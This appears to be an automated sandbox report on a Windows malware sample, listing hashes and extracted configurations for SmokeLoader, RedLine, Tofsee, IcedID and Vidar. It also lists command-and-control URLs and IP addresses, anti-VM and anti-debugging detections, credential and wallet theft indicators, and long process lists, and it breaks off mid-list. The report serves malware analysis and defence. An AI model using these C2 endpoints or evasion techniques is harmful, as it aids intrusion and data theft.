Analysis
-
max time kernel
18002s -
max time network
17997s -
platform
windows7_x64 -
resource
win7-en-20210920 -
submitted
03-11-2021 17:22
Static task
static1
Behavioral task
behavioral1
Sample
1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe
Resource
win10-en-20211014
General
-
Target
1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe
-
Size
292KB
-
MD5
d2fff856a1371f8b3602a2247ab26d46
-
SHA1
c2acff6cdf47ee82fe35637780e163e46ab5c4d7
-
SHA256
1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531
-
SHA512
6579f2e625ca19be10fcea9f68427c9887f21af26752d775b2987dace469759a8588b56a08a533fc4ba5055df4918c87ee1539146e58dc20c5c7280bef6d1d92
Malware Config
Extracted
smokeloader
2020
http://honawey70.top/
http://wijibui00.top/
http://nusurtal4f.net/
http://netomishnetojuk.net/
http://escalivrouter.net/
http://nick22doom4.net/
http://wrioshtivsio.su/
http://nusotiso4.su/
http://rickkhtovkka.biz/
http://palisotoliso.net/
Extracted
tofsee
quadoil.ru
lakeflex.ru
Extracted
redline
SuperStar
185.215.113.29:36224
Extracted
icedid
3022016856
actuallyobligat.info
Extracted
redline
LOVE
91.242.229.222:21475
Extracted
redline
101
185.92.73.142:52097
Extracted
redline
z0rm1on
45.153.186.153:56675
Extracted
vidar
47.8
706
https://mas.to/@romashkin
-
profile_id
706
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 8 IoCs
Processes:
resource yara_rule behavioral1/memory/720-106-0x0000000000800000-0x000000000081C000-memory.dmp family_redline behavioral1/memory/720-114-0x0000000001ED0000-0x0000000001EEB000-memory.dmp family_redline behavioral1/memory/1212-133-0x00000000023B0000-0x00000000023EE000-memory.dmp family_redline behavioral1/memory/1212-134-0x0000000002550000-0x000000000258D000-memory.dmp family_redline behavioral1/memory/1232-143-0x0000000002120000-0x0000000002150000-memory.dmp family_redline behavioral1/memory/1232-144-0x00000000007F0000-0x000000000080B000-memory.dmp family_redline behavioral1/memory/1708-229-0x0000000001DE0000-0x0000000001E0E000-memory.dmp family_redline behavioral1/memory/1708-231-0x0000000001E10000-0x0000000001E3C000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Arkei Stealer Payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/1180-147-0x0000000000220000-0x0000000000241000-memory.dmp family_arkei behavioral1/memory/1180-148-0x0000000000400000-0x00000000008F0000-memory.dmp family_arkei -
Core1 .NET packer 1 IoCs
Detects packer/loader used by .NET malware.
Processes:
resource yara_rule behavioral1/memory/1232-143-0x0000000002120000-0x0000000002150000-memory.dmp Core1 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral1/memory/1308-250-0x0000000000960000-0x0000000000A36000-memory.dmp family_vidar behavioral1/memory/1308-251-0x0000000000400000-0x0000000000959000-memory.dmp family_vidar -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 126 1488 powershell.exe 133 1488 powershell.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
Processes:
CF8F.exeD48F.exeCF8F.exeDE12.exeE18C.exeE812.exezfadmvvq.exeE812.exeFAC9.exe101.exe630.execupd.exesisbkup.exesisbkup.exesisbkup.exeF457.exenDRwKPXQhM.EXeFABE.exe366.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exejjehjsaiuehjsaiuehjsasisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exeiuehjsajjehjsaiuehjsasisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exejjehjsaiuehjsaiuehjsasisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exe5CFC.exe5CFC.exesisbkup.exepid process 812 CF8F.exe 1164 D48F.exe 1056 CF8F.exe 1344 DE12.exe 1628 E18C.exe 1968 E812.exe 1192 zfadmvvq.exe 720 E812.exe 1212 FAC9.exe 1232 101.exe 1180 630.exe 1672 cupd.exe 952 sisbkup.exe 1256 sisbkup.exe 1192 sisbkup.exe 1624 F457.exe 1976 nDRwKPXQhM.EXe 1708 FABE.exe 1308 366.exe 988 sisbkup.exe 1472 sisbkup.exe 1708 sisbkup.exe 1556 sisbkup.exe 1560 sisbkup.exe 1608 sisbkup.exe 1936 jjehjsa 856 iuehjsa 1944 iuehjsa 1588 sisbkup.exe 1732 sisbkup.exe 1740 sisbkup.exe 1696 sisbkup.exe 1992 sisbkup.exe 1148 sisbkup.exe 1292 sisbkup.exe 1444 sisbkup.exe 1792 sisbkup.exe 788 sisbkup.exe 1200 iuehjsa 1216 jjehjsa 572 iuehjsa 1548 sisbkup.exe 1992 sisbkup.exe 1480 sisbkup.exe 364 sisbkup.exe 964 sisbkup.exe 560 sisbkup.exe 2016 sisbkup.exe 1760 sisbkup.exe 1612 sisbkup.exe 1192 sisbkup.exe 1128 jjehjsa 1480 iuehjsa 1952 iuehjsa 748 sisbkup.exe 1276 sisbkup.exe 1584 sisbkup.exe 1400 sisbkup.exe 1548 sisbkup.exe 436 sisbkup.exe 2000 sisbkup.exe 1572 5CFC.exe 1768 5CFC.exe 1740 sisbkup.exe -
Modifies Windows Firewall 1 TTPs
-
Checks BIOS information in registry 2 TTPs 64 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
sisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sisbkup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sisbkup.exe -
Deletes itself 1 IoCs
Processes:
pid process 1264 -
Loads dropped DLL 57 IoCs
Processes:
CF8F.exeDE12.exeE812.exeregsvr32.exe630.execmd.exerundll32.exeWerFault.exerundll32.exejjehjsajjehjsajjehjsa5CFC.exejjehjsajjehjsajjehjsajjehjsajjehjsacmd.exemsiexec.exejjehjsajjehjsajjehjsajjehjsajjehjsajjehjsajjehjsajjehjsajjehjsajjehjsajjehjsajjehjsajjehjsajjehjsajjehjsajjehjsajjehjsajjehjsajjehjsajjehjsajjehjsajjehjsapid process 812 CF8F.exe 1344 DE12.exe 1968 E812.exe 1684 regsvr32.exe 1264 1180 630.exe 1180 630.exe 1180 630.exe 1180 630.exe 1180 630.exe 1180 630.exe 1180 630.exe 1180 630.exe 596 cmd.exe 560 rundll32.exe 560 rundll32.exe 560 rundll32.exe 324 WerFault.exe 324 WerFault.exe 324 WerFault.exe 324 WerFault.exe 960 rundll32.exe 960 rundll32.exe 960 rundll32.exe 1936 jjehjsa 1216 jjehjsa 1128 jjehjsa 1572 5CFC.exe 1064 jjehjsa 1988 jjehjsa 276 jjehjsa 188 jjehjsa 456 jjehjsa 984 cmd.exe 2232 msiexec.exe 2384 jjehjsa 2040 jjehjsa 2704 jjehjsa 2296 jjehjsa 2664 jjehjsa 2564 jjehjsa 2204 jjehjsa 2896 jjehjsa 2580 jjehjsa 1200 jjehjsa 1540 jjehjsa 2680 jjehjsa 1732 jjehjsa 2728 jjehjsa 2412 jjehjsa 2796 jjehjsa 2532 jjehjsa 1568 jjehjsa 3008 jjehjsa 2180 jjehjsa 1080 jjehjsa 1568 jjehjsa -
Modifies file permissions 1 TTPs 3 IoCs
Processes:
icacls.exeicacls.exeicacls.exepid process 1640 icacls.exe 1468 icacls.exe 1740 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule \ProgramData\cupd.exe themida \ProgramData\cupd.exe themida \ProgramData\cupd.exe themida C:\ProgramData\cupd.exe themida C:\ProgramData\cupd.exe themida behavioral1/memory/1672-163-0x0000000001040000-0x0000000001656000-memory.dmp themida behavioral1/memory/1672-164-0x0000000001040000-0x0000000001656000-memory.dmp themida behavioral1/memory/1672-165-0x0000000001040000-0x0000000001656000-memory.dmp themida behavioral1/memory/1672-166-0x0000000001040000-0x0000000001656000-memory.dmp themida behavioral1/memory/1672-167-0x0000000001040000-0x0000000001656000-memory.dmp themida behavioral1/memory/1672-168-0x0000000001040000-0x0000000001656000-memory.dmp themida C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe themida C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe themida behavioral1/memory/952-179-0x0000000001040000-0x0000000001656000-memory.dmp themida behavioral1/memory/952-180-0x0000000001040000-0x0000000001656000-memory.dmp themida behavioral1/memory/952-181-0x0000000001040000-0x0000000001656000-memory.dmp themida behavioral1/memory/952-182-0x0000000001040000-0x0000000001656000-memory.dmp themida behavioral1/memory/952-183-0x0000000001040000-0x0000000001656000-memory.dmp themida behavioral1/memory/952-184-0x0000000001040000-0x0000000001656000-memory.dmp themida behavioral1/memory/1256-185-0x0000000001040000-0x0000000001656000-memory.dmp themida behavioral1/memory/1256-187-0x0000000001040000-0x0000000001656000-memory.dmp themida behavioral1/memory/1256-188-0x0000000001040000-0x0000000001656000-memory.dmp themida behavioral1/memory/1256-189-0x0000000001040000-0x0000000001656000-memory.dmp themida behavioral1/memory/1256-190-0x0000000001040000-0x0000000001656000-memory.dmp themida behavioral1/memory/1256-191-0x0000000001040000-0x0000000001656000-memory.dmp themida C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe themida C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe themida C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe themida C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe themida C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe themida behavioral1/memory/1488-547-0x00000000024F0000-0x000000000313A000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
sisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.execupd.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cupd.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA sisbkup.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
Processes:
cupd.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exepid process 1672 cupd.exe 952 sisbkup.exe 1256 sisbkup.exe 988 sisbkup.exe 1472 sisbkup.exe 1708 sisbkup.exe 1556 sisbkup.exe 1560 sisbkup.exe 1608 sisbkup.exe 1588 sisbkup.exe 1732 sisbkup.exe 1740 sisbkup.exe 1696 sisbkup.exe 1992 sisbkup.exe 1148 sisbkup.exe 1292 sisbkup.exe 1444 sisbkup.exe 1792 sisbkup.exe 788 sisbkup.exe 1548 sisbkup.exe 1992 sisbkup.exe 1480 sisbkup.exe 364 sisbkup.exe 964 sisbkup.exe 560 sisbkup.exe 2016 sisbkup.exe 1760 sisbkup.exe 1612 sisbkup.exe 748 sisbkup.exe 1276 sisbkup.exe 1584 sisbkup.exe 1400 sisbkup.exe 1548 sisbkup.exe 436 sisbkup.exe 2000 sisbkup.exe 1740 sisbkup.exe 1212 sisbkup.exe 1696 sisbkup.exe 1072 sisbkup.exe 1080 sisbkup.exe 1432 sisbkup.exe 2032 sisbkup.exe 1912 sisbkup.exe 1072 sisbkup.exe 1400 sisbkup.exe 948 sisbkup.exe 1432 sisbkup.exe 